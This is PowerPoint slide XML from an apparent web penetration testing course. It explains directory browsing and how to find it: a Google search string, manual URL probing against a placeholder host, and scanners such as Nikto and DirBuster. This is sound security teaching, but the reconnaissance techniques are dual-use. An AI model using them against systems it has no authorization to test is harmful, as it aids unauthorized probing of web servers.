            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="350520" y="1066800"/>
            <a:ext cx="8458200" cy="4114800"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Directory browsing is a feature of web servers, describing how the web server will react if a user surfs to a directory, not an specific page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Option 1: There is an index file, such as index.php, default.htm, or others, the server is configured to display from that directory when the directory is accessed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Option 2: The server may automatically generate a directory index and return that to the client, if it is configured to do so</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Option 3: The server responds with an error message of some sort, such as 403 Forbidden</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Can reveal more than intended, such as configuration or include files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Discoverable via several methods:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Google Searches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Manually</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Automatically</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F28DCA31-AD9C-41E1-8B3B-DA5284A418FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4097705" y="4147914"/>
            <a:ext cx="4360495" cy="2498602"/>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a:xfrm>
            <a:off x="685800" y="137160"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Google Searching </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>for Directory Browsing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86019" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121920" y="1556385"/>
            <a:ext cx="4648200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Google can provide us with directories it has found in a site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>During Recon, we may have performed this search</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Many different search strings are possible to find such functionality, but our favorite is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>intitle:"index of" "last modified"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Searches the title for "index of"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Searches the content on the page for "last modified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t> – Remember that Google searches are case insensitive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>During pen tests, we probably want to focus this search with a site: directive</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>site:target.domain</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8602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56163" y="1543050"/>
            <a:ext cx="4211637" cy="4857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219075" y="121920"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Manual Discovery </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>of Directory Browsing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87043" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198120" y="1722120"/>
            <a:ext cx="8763000" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Using the application map, examine URLs for directories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Attempt to access each directory using our browser to see if a directory listing is provided in the response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Example URL: http://www.target.tld/app/admin/index.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We should attempt to access in the browser:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>http://www.target.tld/app/admin/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>http://www.target.tld/app/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The first example of /app/admin/ may look wrong, since index.php is a typical index page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>But sometimes the index.php page has not been added to the server configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>If we did not test this, it would be a false negative in the report</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Keep in mind that if the server responds with a 403 Forbidden, this means the directory exists but our permissions prevent us from seeing it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219075" y="137160"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Automated Discovery</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>of Directory Browsing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88067" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="655320" y="1767840"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Many of the scanning tools we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'ve discussed search for instances of directory browsing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Specifically, Nikto, Grendel-Scan, and DirBuster</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>These tools use the results from spidering a site, a list of common directory names, or both</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>These tools will also use discovered directory listings to find more files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>We should do the same thing in our manual testing and analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Each discovered directory or page could open a major attack surface area of the web application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic"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041"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Course Roadmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 1042"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="1905000"/>
            <a:ext cx="8458200" cy="4419600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Attacker's View of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>the Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Recon &amp; Mapping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Server-Side Vuln</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Discovery Cont.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Capture the Flag</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Freeform 1044"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="blackWhite">
          <a:xfrm>
            <a:off x="3670300" y="707084"/>
            <a:ext cx="1892300" cy="5846116"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1192"/>
              <a:gd name="T1" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T2" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T3" fmla="*/ 0 h 3984"/>
              <a:gd name="T4" fmla="*/ 2147483647 w 1192"/>
              <a:gd name="T5" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T6" fmla="*/ 0 w 1192"/>
              <a:gd name="T7" fmla="*/ 2147483647 h 3984"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 1192"/>
              <a:gd name="T13" fmla="*/ 0 h 3984"/>
              <a:gd name="T14" fmla="*/ 1192 w 1192"/>
              <a:gd name="T15" fmla="*/ 3984 h 3984"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T8">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T9">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T10">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T12" t="T13" r="T14" b="T15"/>
            <a:pathLst>
              <a:path w="1192" h="3984">
                <a:moveTo>
                  <a:pt x="0" y="2164"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1192" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192" y="3984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2164"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF">
              <a:alpha val="50195"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 1043"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5562600" y="707084"/>
            <a:ext cx="3429000" cy="5922315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99FFCC"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="50800" dist="38100" dir="2700000">
                    <a:srgbClr val="000000">
                      <a:alpha val="43000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Vulnerability Discovery Overview</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Creating Custom Scripts for </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>     Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="MS PGothic" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> Python for Penetration Testing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
